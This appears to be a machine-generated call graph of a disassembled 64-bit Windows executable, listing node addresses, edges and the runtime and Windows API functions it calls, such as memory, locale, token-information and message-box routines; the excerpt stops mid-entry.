16409->16410 16416 7ff6fb1f2325 16409->16416 16412 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16410->16412 16411 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16413 7ff6fb1f231d 16411->16413 16412->16413 16413->16397 16413->16398 16413->16399 16413->16400 16414->16411 16416->16413 16416->16414 16419 7ff6fb1f2cc4 16416->16419 16452 7ff6fb1f2710 16416->16452 16489 7ff6fb1f1ea0 16416->16489 16420 7ff6fb1f2d06 16419->16420 16421 7ff6fb1f2d77 16419->16421 16424 7ff6fb1f2da1 16420->16424 16425 7ff6fb1f2d0c 16420->16425 16422 7ff6fb1f2dd0 16421->16422 16423 7ff6fb1f2d7c 16421->16423 16431 7ff6fb1f2dda 16422->16431 16432 7ff6fb1f2de7 16422->16432 16437 7ff6fb1f2ddf 16422->16437 16426 7ff6fb1f2db1 16423->16426 16427 7ff6fb1f2d7e 16423->16427 16512 7ff6fb1f1074 16424->16512 16428 7ff6fb1f2d40 16425->16428 16429 7ff6fb1f2d11 16425->16429 16519 7ff6fb1f0c64 16426->16519 16430 7ff6fb1f2d20 16427->16430 16440 7ff6fb1f2d8d 16427->16440 16434 7ff6fb1f2d17 16428->16434 16428->16437 16429->16432 16429->16434 16450 7ff6fb1f2e10 16430->16450 16492 7ff6fb1f3478 16430->16492 16431->16424 16431->16437 16526 7ff6fb1f39cc 16432->16526 16434->16430 16439 7ff6fb1f2d52 16434->16439 16448 7ff6fb1f2d3b 16434->16448 16437->16450 16530 7ff6fb1f1484 16437->16530 16439->16450 16502 7ff6fb1f37b4 16439->16502 16440->16424 16442 7ff6fb1f2d92 16440->16442 16442->16450 16508 7ff6fb1f3878 16442->16508 16444 7ff6fb1eb870 _log10_special 8 API calls 16445 7ff6fb1f310a 16444->16445 16445->16416 16448->16450 16451 7ff6fb1f2ffc 16448->16451 16537 7ff6fb1f3ae0 16448->16537 16450->16444 16451->16450 16543 7ff6fb1fdd18 16451->16543 16453 7ff6fb1f2734 16452->16453 16454 7ff6fb1f271e 16452->16454 16455 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16453->16455 16458 7ff6fb1f2774 16453->16458 16456 7ff6fb1f2d06 16454->16456 16457 7ff6fb1f2d77 16454->16457 16454->16458 16455->16458 16461 7ff6fb1f2da1 16456->16461 16462 7ff6fb1f2d0c 16456->16462 16459 7ff6fb1f2dd0 16457->16459 16460 7ff6fb1f2d7c 16457->16460 16458->16416 16468 7ff6fb1f2dda 16459->16468 16469 7ff6fb1f2de7 16459->16469 16474 7ff6fb1f2ddf 16459->16474 16463 7ff6fb1f2db1 16460->16463 16464 7ff6fb1f2d7e 16460->16464 16470 7ff6fb1f1074 38 API calls 16461->16470 16465 7ff6fb1f2d40 16462->16465 16466 7ff6fb1f2d11 16462->16466 16472 7ff6fb1f0c64 38 API calls 16463->16472 16467 7ff6fb1f2d20 16464->16467 16476 7ff6fb1f2d8d 16464->16476 16471 7ff6fb1f2d17 16465->16471 16465->16474 16466->16469 16466->16471 16473 7ff6fb1f3478 47 API calls 16467->16473 16487 7ff6fb1f2e10 16467->16487 16468->16461 16468->16474 16475 7ff6fb1f39cc 45 API calls 16469->16475 16484 7ff6fb1f2d3b 16470->16484 16471->16467 16477 7ff6fb1f2d52 16471->16477 16471->16484 16472->16484 16473->16484 16478 7ff6fb1f1484 38 API calls 16474->16478 16474->16487 16475->16484 16476->16461 16479 7ff6fb1f2d92 16476->16479 16480 7ff6fb1f37b4 46 API calls 16477->16480 16477->16487 16478->16484 16482 7ff6fb1f3878 37 API calls 16479->16482 16479->16487 16480->16484 16481 7ff6fb1eb870 _log10_special 8 API calls 16483 7ff6fb1f310a 16481->16483 16482->16484 16483->16416 16485 7ff6fb1f3ae0 45 API calls 16484->16485 16484->16487 16488 7ff6fb1f2ffc 16484->16488 16485->16488 16486 7ff6fb1fdd18 46 API calls 16486->16488 16487->16481 16488->16486 16488->16487 16769 7ff6fb1f02e8 16489->16769 16493 7ff6fb1f349e 16492->16493 16555 7ff6fb1efea0 16493->16555 16498 7ff6fb1f35e3 16500 7ff6fb1f3ae0 45 API calls 16498->16500 16501 7ff6fb1f3671 16498->16501 16499 7ff6fb1f3ae0 45 API calls 16499->16498 16500->16501 16501->16448 16504 7ff6fb1f37e9 16502->16504 16503 7ff6fb1f382e 16503->16448 16504->16503 16505 7ff6fb1f3807 16504->16505 16506 7ff6fb1f3ae0 45 API calls 16504->16506 16507 7ff6fb1fdd18 46 API calls 16505->16507 16506->16505 16507->16503 16509 7ff6fb1f3899 16508->16509 16510 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16509->16510 16511 7ff6fb1f38ca 16509->16511 16510->16511 16511->16448 16513 7ff6fb1f10a7 16512->16513 16514 7ff6fb1f10d6 16513->16514 16516 7ff6fb1f1193 16513->16516 16518 7ff6fb1f1113 16514->16518 16701 7ff6fb1eff48 16514->16701 16517 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16516->16517 16517->16518 16518->16448 16520 7ff6fb1f0c97 16519->16520 16521 7ff6fb1f0cc6 16520->16521 16523 7ff6fb1f0d83 16520->16523 16522 7ff6fb1eff48 12 API calls 16521->16522 16525 7ff6fb1f0d03 16521->16525 16522->16525 16524 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16523->16524 16524->16525 16525->16448 16527 7ff6fb1f3a0f 16526->16527 16529 7ff6fb1f3a13 __crtLCMapStringW 16527->16529 16709 7ff6fb1f3a68 16527->16709 16529->16448 16531 7ff6fb1f14b7 16530->16531 16532 7ff6fb1f14e6 16531->16532 16534 7ff6fb1f15a3 16531->16534 16533 7ff6fb1eff48 12 API calls 16532->16533 16536 7ff6fb1f1523 16532->16536 16533->16536 16535 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16534->16535 16535->16536 16536->16448 16538 7ff6fb1f3af7 16537->16538 16713 7ff6fb1fccc8 16538->16713 16544 7ff6fb1fdd49 16543->16544 16552 7ff6fb1fdd57 16543->16552 16545 7ff6fb1fdd77 16544->16545 16546 7ff6fb1f3ae0 45 API calls 16544->16546 16544->16552 16547 7ff6fb1fddaf 16545->16547 16548 7ff6fb1fdd88 16545->16548 16546->16545 16550 7ff6fb1fde3a 16547->16550 16551 7ff6fb1fddd9 16547->16551 16547->16552 16759 7ff6fb1ff3b0 16548->16759 16553 7ff6fb1febb0 _fread_nolock MultiByteToWideChar 16550->16553 16551->16552 16762 7ff6fb1febb0 16551->16762 16552->16451 16553->16552 16556 7ff6fb1efed7 16555->16556 16557 7ff6fb1efec6 16555->16557 16556->16557 16585 7ff6fb1fc90c 16556->16585 16563 7ff6fb1fd880 16557->16563 16560 7ff6fb1eff18 16562 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16560->16562 16561 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16561->16560 16562->16557 16564 7ff6fb1fd8d0 16563->16564 16565 7ff6fb1fd89d 16563->16565 16564->16565 16567 7ff6fb1fd902 16564->16567 16566 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16565->16566 16574 7ff6fb1f35c1 16566->16574 16573 7ff6fb1fda15 16567->16573 16580 7ff6fb1fd94a 16567->16580 16568 7ff6fb1fdb07 16625 7ff6fb1fcd6c 16568->16625 16570 7ff6fb1fdacd 16618 7ff6fb1fd104 16570->16618 16572 7ff6fb1fda9c 16611 7ff6fb1fd3e4 16572->16611 16573->16568 16573->16570 16573->16572 16576 7ff6fb1fda5f 16573->16576 16577 7ff6fb1fda55 16573->16577 16574->16498 16574->16499 16601 7ff6fb1fd614 16576->16601 16577->16570 16579 7ff6fb1fda5a 16577->16579 16579->16572 16579->16576 16580->16574 16592 7ff6fb1f97b4 16580->16592 16583 7ff6fb1f9c10 _isindst 17 API calls 16584 7ff6fb1fdb64 16583->16584 16586 7ff6fb1fc957 16585->16586 16591 7ff6fb1fc91b _get_daylight 16585->16591 16587 7ff6fb1f43f4 _get_daylight 11 API calls 16586->16587 16589 7ff6fb1eff04 16587->16589 16588 7ff6fb1fc93e RtlAllocateHeap 16588->16589 16588->16591 16589->16560 16589->16561 16590 7ff6fb2028a0 _get_daylight 2 API calls 16590->16591 16591->16586 16591->16588 16591->16590 16593 7ff6fb1f97c1 16592->16593 16595 7ff6fb1f97cb 16592->16595 16593->16595 16599 7ff6fb1f97e6 16593->16599 16594 7ff6fb1f43f4 _get_daylight 11 API calls 16596 7ff6fb1f97d2 16594->16596 16595->16594 16634 7ff6fb1f9bf0 16596->16634 16598 7ff6fb1f97de 16598->16574 16598->16583 16599->16598 16600 7ff6fb1f43f4 _get_daylight 11 API calls 16599->16600 16600->16596 16637 7ff6fb2033bc 16601->16637 16605 7ff6fb1fd6bc 16606 7ff6fb1fd711 16605->16606 16608 7ff6fb1fd6dc 16605->16608 16610 7ff6fb1fd6c0 16605->16610 16690 7ff6fb1fd200 16606->16690 16686 7ff6fb1fd4bc 16608->16686 16610->16574 16612 7ff6fb2033bc 38 API calls 16611->16612 16613 7ff6fb1fd42e 16612->16613 16614 7ff6fb202e04 37 API calls 16613->16614 16615 7ff6fb1fd47e 16614->16615 16616 7ff6fb1fd482 16615->16616 16617 7ff6fb1fd4bc 45 API calls 16615->16617 16616->16574 16617->16616 16619 7ff6fb2033bc 38 API calls 16618->16619 16620 7ff6fb1fd14f 16619->16620 16621 7ff6fb202e04 37 API calls 16620->16621 16622 7ff6fb1fd1a7 16621->16622 16623 7ff6fb1fd1ab 16622->16623 16624 7ff6fb1fd200 45 API calls 16622->16624 16623->16574 16624->16623 16626 7ff6fb1fcde4 16625->16626 16627 7ff6fb1fcdb1 16625->16627 16629 7ff6fb1fcdfc 16626->16629 16631 7ff6fb1fce7d 16626->16631 16628 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16627->16628 16633 7ff6fb1fcddd memcpy_s 16628->16633 16630 7ff6fb1fd104 46 API calls 16629->16630 16630->16633 16632 7ff6fb1f3ae0 45 API calls 16631->16632 16631->16633 16632->16633 16633->16574 16635 7ff6fb1f9a88 _invalid_parameter_noinfo 37 API calls 16634->16635 16636 7ff6fb1f9c09 16635->16636 16636->16598 16638 7ff6fb20340f fegetenv 16637->16638 16639 7ff6fb20713c 37 API calls 16638->16639 16643 7ff6fb203462 16639->16643 16640 7ff6fb20348f 16645 7ff6fb1f97b4 __std_exception_copy 37 API calls 16640->16645 16641 7ff6fb203552 16642 7ff6fb20713c 37 API calls 16641->16642 16644 7ff6fb20357c 16642->16644 16643->16641 16646 7ff6fb20352c 16643->16646 16647 7ff6fb20347d 16643->16647 16648 7ff6fb20713c 37 API calls 16644->16648 16649 7ff6fb20350d 16645->16649 16652 7ff6fb1f97b4 __std_exception_copy 37 API calls 16646->16652 16647->16640 16647->16641 16650 7ff6fb20358d 16648->16650 16651 7ff6fb204634 16649->16651 16656 7ff6fb203515 16649->16656 16653 7ff6fb207330 20 API calls 16650->16653 16654 7ff6fb1f9c10 _isindst 17 API calls 16651->16654 16652->16649 16664 7ff6fb2035f6 memcpy_s 16653->16664 16655 7ff6fb204649 16654->16655 16657 7ff6fb1eb870 _log10_special 8 API calls 16656->16657 16658 7ff6fb1fd661 16657->16658 16682 7ff6fb202e04 16658->16682 16659 7ff6fb20399f memcpy_s 16660 7ff6fb203cdf 16661 7ff6fb202f20 37 API calls 16660->16661 16668 7ff6fb2043f7 16661->16668 16662 7ff6fb203c8b 16662->16660 16665 7ff6fb20464c memcpy_s 37 API calls 16662->16665 16663 7ff6fb203637 memcpy_s 16676 7ff6fb203f7b memcpy_s 16663->16676 16677 7ff6fb203a93 memcpy_s 16663->16677 16664->16659 16664->16663 16666 7ff6fb1f43f4 _get_daylight 11 API calls 16664->16666 16665->16660 16667 7ff6fb203a70 16666->16667 16669 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16667->16669 16671 7ff6fb20464c memcpy_s 37 API calls 16668->16671 16675 7ff6fb204452 16668->16675 16669->16663 16670 7ff6fb2045d8 16672 7ff6fb20713c 37 API calls 16670->16672 16671->16675 16672->16656 16673 7ff6fb1f43f4 11 API calls _get_daylight 16673->16676 16674 7ff6fb1f43f4 11 API calls _get_daylight 16674->16677 16675->16670 16678 7ff6fb202f20 37 API calls 16675->16678 16681 7ff6fb20464c memcpy_s 37 API calls 16675->16681 16676->16660 16676->16662 16676->16673 16679 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 16676->16679 16677->16662 16677->16674 16680 7ff6fb1f9bf0 37 API calls _invalid_parameter_noinfo 16677->16680 16678->16675 16679->16676 16680->16677 16681->16675 16683 7ff6fb202e23 16682->16683 16684 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16683->16684 16685 7ff6fb202e4e memcpy_s 16683->16685 16684->16685 16685->16605 16687 7ff6fb1fd4e8 memcpy_s 16686->16687 16688 7ff6fb1f3ae0 45 API calls 16687->16688 16689 7ff6fb1fd5a2 memcpy_s 16687->16689 16688->16689 16689->16610 16691 7ff6fb1fd23b 16690->16691 16695 7ff6fb1fd288 memcpy_s 16690->16695 16692 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16691->16692 16693 7ff6fb1fd267 16692->16693 16693->16610 16694 7ff6fb1fd2f3 16696 7ff6fb1f97b4 __std_exception_copy 37 API calls 16694->16696 16695->16694 16697 7ff6fb1f3ae0 45 API calls 16695->16697 16700 7ff6fb1fd335 memcpy_s 16696->16700 16697->16694 16698 7ff6fb1f9c10 _isindst 17 API calls 16699 7ff6fb1fd3e0 16698->16699 16700->16698 16702 7ff6fb1eff6e 16701->16702 16703 7ff6fb1eff7f 16701->16703 16702->16518 16703->16702 16704 7ff6fb1fc90c _fread_nolock 12 API calls 16703->16704 16705 7ff6fb1effb0 16704->16705 16706 7ff6fb1effc4 16705->16706 16707 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16705->16707 16708 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16706->16708 16707->16706 16708->16702 16710 7ff6fb1f3a86 16709->16710 16712 7ff6fb1f3a8e 16709->16712 16711 7ff6fb1f3ae0 45 API calls 16710->16711 16711->16712 16712->16529 16714 7ff6fb1fcce1 16713->16714 16715 7ff6fb1f3b1f 16713->16715 16714->16715 16721 7ff6fb202614 16714->16721 16717 7ff6fb1fcd34 16715->16717 16718 7ff6fb1fcd4d 16717->16718 16720 7ff6fb1f3b2f 16717->16720 16718->16720 16756 7ff6fb201960 16718->16756 16720->16451 16733 7ff6fb1fa460 GetLastError 16721->16733 16725 7ff6fb20266e 16725->16715 16734 7ff6fb1fa484 FlsGetValue 16733->16734 16735 7ff6fb1fa4a1 FlsSetValue 16733->16735 16736 7ff6fb1fa49b 16734->16736 16752 7ff6fb1fa491 16734->16752 16737 7ff6fb1fa4b3 16735->16737 16735->16752 16736->16735 16739 7ff6fb1fdea8 _get_daylight 11 API calls 16737->16739 16738 7ff6fb1fa50d SetLastError 16740 7ff6fb1fa52d 16738->16740 16741 7ff6fb1fa51a 16738->16741 16742 7ff6fb1fa4c2 16739->16742 16743 7ff6fb1f9814 __GetCurrentState 38 API calls 16740->16743 16741->16725 16755 7ff6fb1ff5e8 EnterCriticalSection 16741->16755 16744 7ff6fb1fa4e0 FlsSetValue 16742->16744 16745 7ff6fb1fa4d0 FlsSetValue 16742->16745 16748 7ff6fb1fa532 16743->16748 16746 7ff6fb1fa4fe 16744->16746 16747 7ff6fb1fa4ec FlsSetValue 16744->16747 16749 7ff6fb1fa4d9 16745->16749 16751 7ff6fb1fa204 _get_daylight 11 API calls 16746->16751 16747->16749 16750 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16749->16750 16750->16752 16753 7ff6fb1fa506 16751->16753 16752->16738 16754 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16753->16754 16754->16738 16757 7ff6fb1fa460 __GetCurrentState 45 API calls 16756->16757 16758 7ff6fb201969 16757->16758 16765 7ff6fb206098 16759->16765 16764 7ff6fb1febb9 MultiByteToWideChar 16762->16764 16768 7ff6fb2060fc 16765->16768 16766 7ff6fb1eb870 _log10_special 8 API calls 16767 7ff6fb1ff3cd 16766->16767 16767->16552 16768->16766 16770 7ff6fb1f032f 16769->16770 16771 7ff6fb1f031d 16769->16771 16774 7ff6fb1f033d 16770->16774 16778 7ff6fb1f0379 16770->16778 16772 7ff6fb1f43f4 _get_daylight 11 API calls 16771->16772 16773 7ff6fb1f0322 16772->16773 16775 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16773->16775 16776 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16774->16776 16783 7ff6fb1f032d 16775->16783 16776->16783 16777 7ff6fb1f06f5 16779 7ff6fb1f43f4 _get_daylight 11 API calls 16777->16779 16777->16783 16778->16777 16780 7ff6fb1f43f4 _get_daylight 11 API calls 16778->16780 16781 7ff6fb1f0989 16779->16781 16782 7ff6fb1f06ea 16780->16782 16784 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16781->16784 16785 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16782->16785 16783->16416 16784->16783 16785->16777 16787 7ff6fb1efa24 16786->16787 16816 7ff6fb1ef784 16787->16816 16789 7ff6fb1efa3d 16789->15972 16828 7ff6fb1ef6dc 16790->16828 16794 7ff6fb1e277c 16793->16794 16795 7ff6fb1f43f4 _get_daylight 11 API calls 16794->16795 16796 7ff6fb1e2799 16795->16796 16842 7ff6fb1f3ca4 16796->16842 16801 7ff6fb1e1bf0 49 API calls 16802 7ff6fb1e2807 16801->16802 16803 7ff6fb1e86b0 2 API calls 16802->16803 16804 7ff6fb1e281f 16803->16804 16805 7ff6fb1e2843 MessageBoxA 16804->16805 16806 7ff6fb1e282c MessageBoxW 16804->16806 16807 7ff6fb1e2855 16805->16807 16806->16807 16808 7ff6fb1eb870 _log10_special 8 API calls 16807->16808 16809 7ff6fb1e2865 16808->16809 16809->16002 16811 7ff6fb1e1b06 16810->16811 16812 7ff6fb1ef439 16810->16812 16811->16001 16811->16002 16813 7ff6fb1f43f4 _get_daylight 11 API calls 16812->16813 16814 7ff6fb1ef43e 16813->16814 16815 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16814->16815 16815->16811 16817 7ff6fb1ef7ee 16816->16817 16818 7ff6fb1ef7ae 16816->16818 16817->16818 16820 7ff6fb1ef7fa 16817->16820 16819 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16818->16819 16821 7ff6fb1ef7d5 16819->16821 16827 7ff6fb1f477c EnterCriticalSection 16820->16827 16821->16789 16829 7ff6fb1e19b9 16828->16829 16830 7ff6fb1ef706 16828->16830 16829->15979 16829->15980 16830->16829 16831 7ff6fb1ef715 memcpy_s 16830->16831 16832 7ff6fb1ef752 16830->16832 16834 7ff6fb1f43f4 _get_daylight 11 API calls 16831->16834 16841 7ff6fb1f477c EnterCriticalSection 16832->16841 16837 7ff6fb1ef72a 16834->16837 16839 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16837->16839 16839->16829 16846 7ff6fb1f3cfe 16842->16846 16843 7ff6fb1f3d23 16844 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16843->16844 16848 7ff6fb1f3d4d 16844->16848 16845 7ff6fb1f3d5f 16872 7ff6fb1f1f30 16845->16872 16846->16843 16846->16845 16850 7ff6fb1eb870 _log10_special 8 API calls 16848->16850 16849 7ff6fb1f3e3c 16851 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16849->16851 16853 7ff6fb1e27d8 16850->16853 16851->16848 16860 7ff6fb1f4480 16853->16860 16854 7ff6fb1f3e60 16854->16849 16856 7ff6fb1f3e6a 16854->16856 16855 7ff6fb1f3e11 16857 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16855->16857 16859 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16856->16859 16857->16848 16858 7ff6fb1f3e08 16858->16849 16858->16855 16859->16848 16861 7ff6fb1fa5d8 _get_daylight 11 API calls 16860->16861 16862 7ff6fb1f4497 16861->16862 16863 7ff6fb1e27df 16862->16863 16864 7ff6fb1fdea8 _get_daylight 11 API calls 16862->16864 16867 7ff6fb1f44d7 16862->16867 16863->16801 16865 7ff6fb1f44cc 16864->16865 16866 7ff6fb1f9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16865->16866 16866->16867 16867->16863 17010 7ff6fb1fdf30 16867->17010 16870 7ff6fb1f9c10 _isindst 17 API calls 16871 7ff6fb1f451c 16870->16871 16873 7ff6fb1f1f6e 16872->16873 16874 7ff6fb1f1f5e 16872->16874 16875 7ff6fb1f1f77 16873->16875 16879 7ff6fb1f1fa5 16873->16879 16878 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16874->16878 16876 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16875->16876 16877 7ff6fb1f1f9d 16876->16877 16877->16849 16877->16854 16877->16855 16877->16858 16878->16877 16879->16874 16879->16877 16880 7ff6fb1f3ae0 45 API calls 16879->16880 16881 7ff6fb1f2254 16879->16881 16886 7ff6fb1f28c0 16879->16886 16912 7ff6fb1f2588 16879->16912 16942 7ff6fb1f1e10 16879->16942 16880->16879 16884 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16881->16884 16884->16874 16887 7ff6fb1f2975 16886->16887 16888 7ff6fb1f2902 16886->16888 16891 7ff6fb1f297a 16887->16891 16892 7ff6fb1f29cf 16887->16892 16889 7ff6fb1f299f 16888->16889 16890 7ff6fb1f2908 16888->16890 16959 7ff6fb1f0e70 16889->16959 16894 7ff6fb1f290d 16890->16894 16898 7ff6fb1f29de 16890->16898 16895 7ff6fb1f29af 16891->16895 16897 7ff6fb1f297c 16891->16897 16892->16889 16892->16898 16910 7ff6fb1f2938 16892->16910 16901 7ff6fb1f2950 16894->16901 16903 7ff6fb1f291d 16894->16903 16894->16910 16966 7ff6fb1f0a60 16895->16966 16900 7ff6fb1f298b 16897->16900 16897->16903 16911 7ff6fb1f2a0d 16898->16911 16973 7ff6fb1f1280 16898->16973 16900->16889 16904 7ff6fb1f2990 16900->16904 16901->16911 16955 7ff6fb1f36e0 16901->16955 16903->16911 16945 7ff6fb1f3224 16903->16945 16907 7ff6fb1f3878 37 API calls 16904->16907 16904->16911 16906 7ff6fb1eb870 _log10_special 8 API calls 16908 7ff6fb1f2ca3 16906->16908 16907->16910 16908->16879 16910->16911 16980 7ff6fb1fdb68 16910->16980 16911->16906 16913 7ff6fb1f2593 16912->16913 16914 7ff6fb1f25a9 16912->16914 16915 7ff6fb1f2975 16913->16915 16916 7ff6fb1f2902 16913->16916 16918 7ff6fb1f25e7 16913->16918 16917 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16914->16917 16914->16918 16921 7ff6fb1f29cf 16915->16921 16922 7ff6fb1f297a 16915->16922 16919 7ff6fb1f299f 16916->16919 16920 7ff6fb1f2908 16916->16920 16917->16918 16918->16879 16926 7ff6fb1f0e70 38 API calls 16919->16926 16929 7ff6fb1f290d 16920->16929 16932 7ff6fb1f29de 16920->16932 16921->16919 16921->16932 16937 7ff6fb1f2938 16921->16937 16923 7ff6fb1f29af 16922->16923 16924 7ff6fb1f297c 16922->16924 16927 7ff6fb1f0a60 38 API calls 16923->16927 16925 7ff6fb1f291d 16924->16925 16930 7ff6fb1f298b 16924->16930 16928 7ff6fb1f3224 47 API calls 16925->16928 16941 7ff6fb1f2a0d 16925->16941 16926->16937 16927->16937 16928->16937 16929->16925 16931 7ff6fb1f2950 16929->16931 16929->16937 16930->16919 16934 7ff6fb1f2990 16930->16934 16935 7ff6fb1f36e0 47 API calls 16931->16935 16931->16941 16933 7ff6fb1f1280 38 API calls 16932->16933 16932->16941 16933->16937 16938 7ff6fb1f3878 37 API calls 16934->16938 16934->16941 16935->16937 16936 7ff6fb1eb870 _log10_special 8 API calls 16939 7ff6fb1f2ca3 16936->16939 16940 7ff6fb1fdb68 47 API calls 16937->16940 16937->16941 16938->16937 16939->16879 16940->16937 16941->16936 16993 7ff6fb1f0034 16942->16993 16946 7ff6fb1f3246 16945->16946 16947 7ff6fb1efea0 12 API calls 16946->16947 16948 7ff6fb1f328e 16947->16948 16949 7ff6fb1fd880 46 API calls 16948->16949 16950 7ff6fb1f3361 16949->16950 16951 7ff6fb1f3ae0 45 API calls 16950->16951 16954 7ff6fb1f3383 16950->16954 16951->16954 16952 7ff6fb1f340c 16952->16910 16952->16952 16953 7ff6fb1f3ae0 45 API calls 16953->16952 16954->16952 16954->16953 16954->16954 16956 7ff6fb1f36f8 16955->16956 16958 7ff6fb1f3760 16955->16958 16957 7ff6fb1fdb68 47 API calls 16956->16957 16956->16958 16957->16958 16958->16910 16960 7ff6fb1f0ea3 16959->16960 16961 7ff6fb1f0ed2 16960->16961 16963 7ff6fb1f0f8f 16960->16963 16962 7ff6fb1efea0 12 API calls 16961->16962 16965 7ff6fb1f0f0f 16961->16965 16962->16965 16964 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16963->16964 16964->16965 16965->16910 16967 7ff6fb1f0a93 16966->16967 16968 7ff6fb1f0ac2 16967->16968 16970 7ff6fb1f0b7f 16967->16970 16969 7ff6fb1efea0 12 API calls 16968->16969 16972 7ff6fb1f0aff 16968->16972 16969->16972 16971 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16970->16971 16971->16972 16972->16910 16974 7ff6fb1f12b3 16973->16974 16975 7ff6fb1f12e2 16974->16975 16978 7ff6fb1f139f 16974->16978 16976 7ff6fb1f131f 16975->16976 16977 7ff6fb1efea0 12 API calls 16975->16977 16976->16910 16977->16976 16979 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16978->16979 16979->16976 16981 7ff6fb1fdb90 16980->16981 16982 7ff6fb1fdbd5 16981->16982 16983 7ff6fb1f3ae0 45 API calls 16981->16983 16986 7ff6fb1fdb95 memcpy_s 16981->16986 16989 7ff6fb1fdbbe memcpy_s 16981->16989 16982->16986 16982->16989 16990 7ff6fb1ffaf8 16982->16990 16983->16982 16984 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16984->16986 16986->16910 16989->16984 16989->16986 16992 7ff6fb1ffb1c WideCharToMultiByte 16990->16992 16994 7ff6fb1f0073 16993->16994 16995 7ff6fb1f0061 16993->16995 16998 7ff6fb1f0080 16994->16998 17001 7ff6fb1f00bd 16994->17001 16996 7ff6fb1f43f4 _get_daylight 11 API calls 16995->16996 16997 7ff6fb1f0066 16996->16997 16999 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 16997->16999 17000 7ff6fb1f9b24 _invalid_parameter_noinfo 37 API calls 16998->17000 17003 7ff6fb1f0071 16999->17003 17000->17003 17002 7ff6fb1f0166 17001->17002 17004 7ff6fb1f43f4 _get_daylight 11 API calls 17001->17004 17002->17003 17005 7ff6fb1f43f4 _get_daylight 11 API calls 17002->17005 17003->16879 17007 7ff6fb1f015b 17004->17007 17006 7ff6fb1f0210 17005->17006 17008 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17006->17008 17009 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17007->17009 17008->17003 17009->17002 17013 7ff6fb1fdf4d 17010->17013 17011 7ff6fb1fdf52 17012 7ff6fb1f43f4 _get_daylight 11 API calls 17011->17012 17016 7ff6fb1f44fd 17011->17016 17018 7ff6fb1fdf5c 17012->17018 17013->17011 17014 7ff6fb1fdf9c 17013->17014 17013->17016 17014->17016 17017 7ff6fb1f43f4 _get_daylight 11 API calls 17014->17017 17015 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17015->17016 17016->16863 17016->16870 17017->17018 17018->17015 17020 7ff6fb1f7555 17019->17020 17021 7ff6fb1f7568 17019->17021 17022 7ff6fb1f43f4 _get_daylight 11 API calls 17020->17022 17029 7ff6fb1f71cc 17021->17029 17024 7ff6fb1f755a 17022->17024 17027 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 17024->17027 17026 7ff6fb1f7566 17026->16020 17027->17026 17036 7ff6fb1ff5e8 EnterCriticalSection 17029->17036 17038 7ff6fb1e7c13 __std_exception_destroy 17037->17038 17039 7ff6fb1e7b91 GetTokenInformation 17037->17039 17042 7ff6fb1e7c2c 17038->17042 17043 7ff6fb1e7c26 CloseHandle 17038->17043 17040 7ff6fb1e7bb2 GetLastError 17039->17040 17041 7ff6fb1e7bbd 17039->17041 17040->17038 17040->17041 17041->17038 17044 7ff6fb1e7bd9 GetTokenInformation 17041->17044 17042->16029 17043->17042 17044->17038 17045 7ff6fb1e7bfc 17044->17045 17045->17038 17046 7ff6fb1e7c06 ConvertSidToStringSidW 17045->17046 17046->17038 17048 7ff6fb1e297a 17047->17048 17332 7ff6fb1e3f70 108 API calls 17331->17332 17333 7ff6fb1e1463 17332->17333 17334 7ff6fb1e146b 17333->17334 17335 7ff6fb1e148c 17333->17335 17336 7ff6fb1e25f0 53 API calls 17334->17336 17337 7ff6fb1ef9f4 73 API calls 17335->17337 17338 7ff6fb1e147b 17336->17338 17339 7ff6fb1e14a1 17337->17339 17338->16088 17340 7ff6fb1e14a5 17339->17340 17341 7ff6fb1e14c1 17339->17341 17342 7ff6fb1e2760 53 API calls 17340->17342 17343 7ff6fb1e14f1 17341->17343 17344 7ff6fb1e14d1 17341->17344 17350 7ff6fb1e14bc __std_exception_destroy 17342->17350 17347 7ff6fb1e14f7 17343->17347 17352 7ff6fb1e150a 17343->17352 17345 